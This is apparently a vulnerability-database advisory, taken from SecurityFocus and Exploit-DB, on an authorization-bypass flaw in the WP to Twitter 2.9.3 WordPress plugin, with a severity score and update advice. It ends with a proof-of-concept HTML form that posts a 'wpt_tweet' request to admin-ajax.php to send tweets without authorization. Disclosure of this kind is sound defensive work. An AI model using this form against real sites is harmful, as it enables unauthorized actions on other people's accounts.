WP to Twitter Plugin Authorization-Bypass Vulnerability

vendor:

WP to Twitter Plugin for WordPress

by:

SecurityFocus

7,5

CVSS

HIGH

Authorization-Bypass

287

CWE

Product Name: WP to Twitter Plugin for WordPress

Affected Version From: 2.9.3

Affected Version To: 2.9.3

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

WP to Twitter Plugin Authorization-Bypass Vulnerability

WP to Twitter Plugin for WordPress is prone to an authorization-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks. WP to Twitter 2.9.3 is vulnerable; other versions may also be affected.

Mitigation:

Update to the latest version of WP to Twitter Plugin for WordPress.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/69741/info

WP to Twitter Plugin for WordPress is prone to an authorization-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.

WP to Twitter 2.9.3 is vulnerable; other versions may also be affected. 

<html><body>
<form method="post" action="http://www.example.com/wordpress/wp-admin/admin-ajax.php">
action:<input name="action" value="wpt_tweet"><br>
tweet action:<input name="tweet_action" value="tweet"><br>
tweet text: <input value="" name="tweet_text"><br>
tweet schedule: <input value="undefined+undefined" name="tweet_schedule"><br>
tweet post id: <input value="1" name="tweet_post_id"><br>
<input type="submit" value="Submit">
</form>
</body></html>